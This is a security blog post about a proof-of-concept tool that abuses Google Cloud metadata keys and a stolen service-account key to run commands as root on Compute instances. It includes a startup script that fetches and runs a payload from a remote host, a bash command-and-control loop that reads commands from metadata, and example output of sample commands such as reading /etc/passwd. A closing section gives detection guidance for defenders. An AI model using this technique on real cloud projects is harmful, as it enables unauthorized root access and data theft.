GCP Misconfiguration & API Abuse - Kinda C2 PoC

Introduction

A few weeks ago, this blog post was released by researchers at Mitiga. Their researchers had found an interesting feature in Google Cloud’s use of metadata keys, which could potentially be abused by a threat actor to execute arbitrary code against a Google Cloud Compute instance - under the context of root in some cases! This enables a type of command-and-control (C2) behavior, a means of potential data exfiltration, or additional attacks.

I found this interesting for a few reasons:

- The startup-script metadata key’s value is executed as root on startup, meaning there’s potential for establishing a nice foothold

- This works even if a GCE instance is firewalled off from the internet or other resources

- This works on out of the box Google Cloud deployments - no modifications to IAM roles, permissions, global or project settings

- All activity (creating, modifying, and checking command output) is conducted through native Google Cloud APIs

This also assumes a few things are in order for this “attack”, or abuse, of the native APIs to work in an attacker’s favor:

- You need to have valid credentials (e.g., a Service Account key)

- The roles bound to that account must include the permissions that allow this to work

I wanted to make a tool to help with testing this for red teams, penetration testers, and blue teams alike.

GCP Test Environment

I’d like to note that this proof of concept was tested in a new GCP environment. All permissions and settings, both project-level and global, are as-is and out of the box. No modifications were made to any configurations. The only difference here is that an assumed breach model was used by extracting a service account key (JSON) for the GCP Compute Service Account - hard part, done.

In an attack scenario, valid credentials need to be found on your own, so use your imagination. Testing in a Google shop and doing some phishing, too?

COUGH! Google Apps Script! COUGH!

GCP Project Setup



To develop this tool for testing, I stood up a new Google Cloud environment and created a new Project within.

Once the project was set up, I navigated over to the Compute Engine section of the Project and enabled the Compute Engine API so I can create instances.

After the Compute Engine API was enabled for the project, I created a new instance. A standard Linux box; no changes to the default options apart from the instance size ($$$) and the instance name.



When attempting to edit the instance, I noticed that if you try to manually create a metadata key called startup-script in the options page of the GCE instance via the cloud console, it will prevent you from doing so and instead suggests placing your startup script content within the “Automation” section.

This isn’t the case when setting the startup-script metadata key programmatically via the API. When you add a metadata key named startup-script through the API, it populates the “Startup script” field rather than showing up as a traditional metadata key. As far as I know, this is the only way to set the startup script content for the “Automation” section programmatically.

When checking this page after executing the script, the value of the startup-script key does populate in the “Startup script” field within the “Automation” section. So, technically not a metadata key/value addition in the console’s view, but it puts the contents in the right location.

Obtaining a Key for the Compute Service Account



To continue with the assumed breach model, I’ll generate a key for the “Compute Engine default service account”. This built-in service account is created when enabling the Compute Engine API and has, at minimum, the three permissions we’re looking for in order for the “attack” to work.

As described in Mitiga’s blog post the required role permissions are:

- compute.instances.getSerialPortOutput

- compute.instances.setMetadata

- compute.instances.reset
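As a rough sketch of the idea behind a permission check (not the actual code from my script), the comparison boils down to a set difference. The `granted` list here is a made-up example; in practice it would have to come from somewhere like the Resource Manager `testIamPermissions` call, which is an assumption on my part about how you would source it. Note that IAM spells the second permission `setMetadata`.

```python
# Permissions named in the post; spelling follows Google's IAM reference.
REQUIRED_PERMISSIONS = frozenset({
    "compute.instances.getSerialPortOutput",
    "compute.instances.setMetadata",
    "compute.instances.reset",
})


def missing_permissions(granted):
    """Return the required permissions absent from `granted`, sorted."""
    return sorted(REQUIRED_PERMISSIONS - set(granted))


if __name__ == "__main__":
    # Hypothetical result of a permission lookup for some credential.
    granted = ["compute.instances.get", "compute.instances.reset"]
    for perm in missing_permissions(granted):
        print(f"[-] missing: {perm}")
```

An empty return value means all three permissions are present.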

Naturally, you’ll need to obtain credentials through other means.

Visiting “IAM & Admin” > “Service Accounts” you will see the “Compute Engine default service account” listed. Clicking the “Actions” menu, you can select “Manage keys” to generate a key for this service account.

Then, simply select “ADD KEY”, select “Create new key”, ensure “JSON” is selected, and click “Create”.

Once you click “Create”, a JSON file is downloaded automatically, which you’ll need later when using the “PoC” script. For ease, I rename the file to “creds.json”.

The “Proof of Concept” Code (Script)

I call the script proof of concept code very loosely, as this is more of a script for red teams to potentially leverage during an engagement. It isn’t doing any sick buff3r 0verfl0ws or remote code execution, yo.

You can find the GitHub repo here.

This was built using Google Cloud’s native Python libraries for GCP API, authentication, and so on. At some point I’ll modify or extend this to use something like requests.get() and requests.post() from the requests Python library to accomplish the same results without having to rely on GCP’s Python libraries - in that case, you would only need a Bearer authorization token instead of JSON credentials… it’s probably easier to get your hands on an auth token anyways.

The script is broken down into three commands:

- check - check the roles associated with the account you have access to, to determine if the required roles are present

- exploit - set the startup-script and s3r1al metadata keys and values on the specified instance

- modify - modify the s3r1al metadata key’s value to an arbitrary command to execute

The script can be modified, but currently relies on input for a remote host and port. The value for the startup-script metadata key will tell curl to download the payload file from a remote host and save the script to /root and execute it.

```bash
#!/bin/bash
curl <REMOTE_HOST>:<REMOTE_PORT>/<PAYLOAD_NAME> > /root/<PAYLOAD_NAME>
chmod +x /root/<PAYLOAD_NAME>
cd /root/ && ./<PAYLOAD_NAME>
```

This can be changed. For example, you can simply echo the contents of the payload metalisten.sh directly into a file and execute in the same manner. That would be an appropriate change if the instance does not have outbound access to the internet.

When using either the modify or exploit command to change the arbitrary command stored in the s3r1al metadata key, the script will ask if you want to reset the instance. Resetting will ensure your “first stage” payload (startup-script) is executed. This isn’t necessarily OPSEC safe, as the instance will go offline for a brief period of time. You can decline to reset the instance and wait until it’s rebooted later (e.g., during maintenance).

Below is an example of using the exploit, check, and modify commands:

```
$ python3 gce-s3r1al.py exploit --host 1.2.3.4 --port 8000 --payloadfile metalisten.sh --authfile creds.json --project serial-poc-1 --zone us-central1-a --instance poc-instance
[+] Modifying startup metadata on poc-instance...
[+] Getting Bearer token from creds.json
[!] Bearer Token: ya29.c...
[+] Getting metadata fingerprint...
[+] Got fingerprint: AYmi15-6jIU=
[+] Modifying 'startup-script' metadata key value to new payload...
[+] Creating metadata key 's3r1al' for arbitrary command usage...
[!] New metadata added (s3r1al might not appear; run again to verify):
{'kind': 'compute#metadata', 'fingerprint': 'AYmi15-6jIU=', 'items': [{'key': 'startup-script', 'value': '#!/bin/bash\ncurl 1.2.3.4:8000/metalisten.sh > /root/metalisten.sh\nchmod +x /root/metalisten.sh\ncd /root/ && ./metalisten.sh'}, {'key': 's3r1al', 'value': 'whoami'}]}
[?] Reset instance poc-instance now? (Y/N) > N
[*] poc-instance will not be reset now - await next reboot for startup script to execute.
[!] Use the GCP Compute API to read command output sent to the serial port
Use: curl -XGET -H "Authorization: Bearer ya29.c..." https://compute.googleapis.com/compute/v1/projects/serial-poc-1/zones/us-central1-a/instances/poc-instance/serialPort?port=3
```

```
$ python3 gce-s3r1al.py check --authfile creds.json
[+] The role 'compute.instances.getSerialPortOutput' was found!
[+] The role 'compute.instances.setMetaData' was found!
[+] The role 'compute.instances.reset' was found!
[+] All required permissions were found - attack will likely succeed!
```

```
$ python3 gce-s3r1al.py modify --authfile creds.json --project serial-poc-1 --zone us-central1-a --instance poc-instance
[+] Modifying 's3r1al' key value on poc-instance...
[+] Getting metadata fingerprint...
[+] Got fingerprint: AYmi15-6jIU=
[?] Enter new command > cat /etc/passwd
[+] Modified! Check output using 'serialPort?port=3'
```
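The “get fingerprint, then modify” steps in the output above exist because the setMetadata call replaces the whole list of metadata items and expects the current fingerprint alongside it. Here is a minimal sketch of building that request body; the helper name `with_metadata_item` is mine and not something from the script or from Google’s libraries, and it only builds the body without sending anything.

```python
import copy


def with_metadata_item(metadata, key, value):
    """Return a setMetadata request body with `key` set to `value`.

    `metadata` is the instance's current metadata object as returned by the
    API. The fingerprint is carried over unchanged, and the existing items
    are kept so they are not wiped out by the update.
    """
    body = {
        "fingerprint": metadata["fingerprint"],
        "items": copy.deepcopy(metadata.get("items", [])),
    }
    for item in body["items"]:
        if item["key"] == key:
            item["value"] = value  # overwrite an existing key in place
            break
    else:
        # Key not present yet, so append it as a new item.
        body["items"].append({"key": key, "value": value})
    return body


if __name__ == "__main__":
    current = {
        "kind": "compute#metadata",
        "fingerprint": "AYmi15-6jIU=",
        "items": [{"key": "s3r1al", "value": "whoami"}],
    }
    print(with_metadata_item(current, "s3r1al", "cat /etc/passwd"))
```

Copying the items first keeps the caller’s metadata object untouched, which makes it easy to compare the before and after states.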

The Payload (It’s just a bash script…)

The payload is a simple bash script that loops indefinitely until the instance is either terminated, reset, or the PID of the script is killed.

The bash script will use curl to continuously check the local metadata server URL for the predetermined metadata key (s3r1al) and will execute the given command when it detects the value for the key has changed.

What’s nice about this is that the local metadata API already provides an option for this continuous check behavior, rather than having to write the payload to check every X seconds, for example. Looking at the [“Query VM metadata” documentation](https://cloud.google.com/compute/docs/metadata/querying-metadata), you can append the ?wait_for_change=true option to the URI, which allows the script to take the output from curl (i.e.: the command to be executed) only when a change to the s3r1al key’s value is detected. This will detect the change when using the modify command of the script to apply a new command as the value of the s3r1al key.

Since this script is running in the background as root, we’re able to take standard output of the commands executed by the script and send it to one of the TTYs available to us; specifically, /dev/ttyS2.
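To make the wait_for_change behavior a bit more concrete, here is a small sketch that only builds the long-polling request and sends nothing. The function name `build_watch_request` is hypothetical; the URL and the Metadata-Flavor header are the same ones the bash payload uses. Actually sending the request only works from inside a GCE instance, where it would block until the key’s value changes.

```python
import urllib.parse
import urllib.request

METADATA_BASE = "http://metadata.google.internal/computeMetadata/v1"


def build_watch_request(key):
    """Build a long-polling request for one custom instance attribute."""
    path = "/instance/attributes/" + urllib.parse.quote(key, safe="")
    url = METADATA_BASE + path + "?wait_for_change=true"
    # The metadata server expects this header on every query.
    return urllib.request.Request(url, headers={"Metadata-Flavor": "Google"})


if __name__ == "__main__":
    req = build_watch_request("s3r1al")
    print(req.full_url)
```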



Documented in Google Cloud’s “Troubleshooting using the serial console” documentation, here is the mapping of serial ports for both Windows and Linux servers via the API.

What’s also noted in this documentation is the mapping of default GCE Windows/Linux images and what logging service or daemon outputs to which serial port.

I chose /dev/ttyS2 to log standard output from command execution because querying that port (port 3 via the API) returns no content by default. That means we can use /dev/ttyS2 / port 3 exclusively for this tool, as we can always expect the output of arbitrary commands issued by us to land on a dedicated port.
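The device-to-port mapping is just an off-by-one: Linux counts serial devices from 0, while the API counts ports from 1. A tiny sketch, with a helper name (`api_port_for_tty`) that I made up for illustration:

```python
import re


def api_port_for_tty(device):
    """Map a Linux serial device such as /dev/ttyS2 to its API port number."""
    match = re.fullmatch(r"/dev/ttyS([0-3])", device)
    if match is None:
        raise ValueError(f"not one of the four serial devices: {device!r}")
    # Devices count from 0, API ports count from 1.
    return int(match.group(1)) + 1


if __name__ == "__main__":
    print(api_port_for_tty("/dev/ttyS2"))
```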

Below is the basic bash payload:

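```bash
#!/bin/bash
while true
do
  # Block until the s3r1al metadata value changes, then read the new command
  CMD=$(/usr/bin/curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/s3r1al?wait_for_change=true" -H "Metadata-Flavor: Google" 2>/dev/null)
  # Quote the command so bash -c receives it as a single string
  /bin/bash -c "${CMD}" >> /dev/ttyS2
done
```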

Getting Command Output from Serial API

As previously noted, we can use the GCP Compute API to perform a GET request to the specific serial port (/dev/ttyS2 = Port 3) to view the serial port output.

This is an example curl request used after modifying the value, or command to execute, in the s3r1al metadata key.

```
curl -XGET -H "Authorization: Bearer <BEARER_TOKEN>" https://compute.googleapis.com/compute/v1/projects/serial-poc-1/zones/us-central1-a/instances/poc-instance/serialPort?port=3
```

The response to this GET request looks like the following. In this example, it’s the output of setting the value of the s3r1al metadata key to the command id:

```
$ curl -XGET -H "Authorization: Bearer <BEARER_TOKEN>" https://compute.googleapis.com/compute/v1/projects/serial-poc-1/zones/us-central1-a/instances/poc-instance/serialPort?port=3
{
  "kind": "compute#serialPortOutput",
  "contents": "uid=0(root) gid=0(root) groups=0(root)\r\n",
  "start": "0",
  "next": "40",
  "selfLink": "https://www.googleapis.com/compute/v1/projects/serial-poc-1/zones/us-central1-a/instances/poc-instance/serialPortOutput"
}
```

The output of the commands issued via the s3r1al metadata key will populate in the “contents” field of the JSON response. As more commands send output here, it becomes difficult to read, so there are some improvements to be made for the tool to normalize the output from the response.
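One possible way to tidy this up, sketched here and not yet part of the tool: split “contents” into clean lines and hand the “next” value back as the `start` offset of the following request, so each read only returns new output. The function names are my own, and the sketch only builds the URL and parses a response body; the HTTP call and the Bearer token handling are left out.

```python
import json
import urllib.parse

API_ROOT = "https://compute.googleapis.com/compute/v1"


def serial_port_url(project, zone, instance, port=3, start=0):
    """Build the serialPort URL; `start` is the byte offset to read from."""
    path = f"/projects/{project}/zones/{zone}/instances/{instance}/serialPort"
    query = urllib.parse.urlencode({"port": port, "start": start})
    return f"{API_ROOT}{path}?{query}"


def parse_serial_output(raw_json):
    """Return (lines, next_offset) from a serialPortOutput response body."""
    data = json.loads(raw_json)
    # Serial output uses CRLF line endings; splitlines() handles both forms.
    lines = [line for line in data.get("contents", "").splitlines() if line]
    return lines, int(data["next"])


if __name__ == "__main__":
    sample = json.dumps({
        "kind": "compute#serialPortOutput",
        "contents": "uid=0(root) gid=0(root) groups=0(root)\r\n",
        "start": "0",
        "next": "40",
    })
    lines, next_offset = parse_serial_output(sample)
    print(lines)
    print(serial_port_url("serial-poc-1", "us-central1-a", "poc-instance",
                          start=next_offset))
```

Passing the returned offset back in as `start` avoids re-reading everything that earlier commands already wrote to the port.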



Logging & Artifacts

Using GCP’s native APIs, especially against GCE instances, leaves a decent amount of telemetry out of the box! This can allow blue teams to get a leg up, see what this type of activity looks like, and possibly route it through Pub/Sub to get this data into a SIEM for alerting.

Browsing to “Logging” > “Logs Explorer”, you can refine your search to look for v1.compute.instances.setMetadata, which will reveal information such as:

- Metadata keys added/removed

- Principal account that made the change

- Caller IP where the change via the API was made from

- Date/Time

- Other metadata about the Project, instance name, etc.

Additionally, you can search for v1.compute.instances.reset actions shortly after this type of event, which can be an indicator that: metadata key/value changed + instance was reset = could be bad

Developers and administrators may use metadata keys for other purposes, so from a threat hunting perspective this won’t always be something bad happening, but it’s worth investigating!
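For blue teams, the “metadata changed + instance reset” pairing can be sketched as a simple correlation over exported log entries. Everything about the entry shape below (the `method`, `instance`, and `timestamp` keys) is a simplification I made up for illustration; real audit log entries are nested and would need flattening first. The 10 minute window is likewise an arbitrary assumption.

```python
from datetime import datetime, timedelta

SET_METADATA = "v1.compute.instances.setMetadata"
RESET = "v1.compute.instances.reset"

# Logs Explorer filter that matches either method name.
LOG_FILTER = f'protoPayload.methodName=("{SET_METADATA}" OR "{RESET}")'


def metadata_then_reset(entries, window=timedelta(minutes=10)):
    """Return (instance, change_time, reset_time) for resets soon after a change."""
    last_change = {}
    hits = []
    for entry in sorted(entries, key=lambda e: e["timestamp"]):
        instance, when = entry["instance"], entry["timestamp"]
        if entry["method"] == SET_METADATA:
            last_change[instance] = when
        elif entry["method"] == RESET and instance in last_change:
            if when - last_change[instance] <= window:
                hits.append((instance, last_change[instance], when))
    return hits


if __name__ == "__main__":
    now = datetime.now()
    demo = [
        {"method": SET_METADATA, "instance": "poc-instance", "timestamp": now},
        {"method": RESET, "instance": "poc-instance",
         "timestamp": now + timedelta(minutes=2)},
    ]
    print(LOG_FILTER)
    print(metadata_then_reset(demo))
```

A hit is only a lead, since legitimate admin workflows also change metadata and then reset.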

I have not found a way to see what the value of a particular key was changed to through using the built-in logging as-is, but that doesn’t mean it’s impossible. If I find a way to obtain that level of visibility in the logs, I will certainly update here.

Mitigations and Prevention

The original blog post by the researchers at Mitiga did an excellent job of listing high-level points to prevent this from succeeding in your environment. I do not want to claim credit for providing mitigation techniques, so definitely give their post a read if you haven’t already and take a look at mitigations while you’re there!

Retrospective

While this isn’t a proof of concept for an exploit per se, it was fun to work on a tool to assist in testing and taking advantage of this unique “feature” that exists in GCP. At the same time, I learned more about Google Cloud’s APIs, what is visible from a logging perspective, and what’s available to security operations teams to log, identify anomalies related to use of these APIs, and conduct threat hunting against.

Some ToDo’s:

- Make this script not dependent on Google Cloud Python libraries by leveraging requests.get() and requests.post() for basic REST API calls (GET/POST)

- Make a function to do a GET request against the getSerialPortOutput API endpoint and parse data to make STDOUT of commands more readable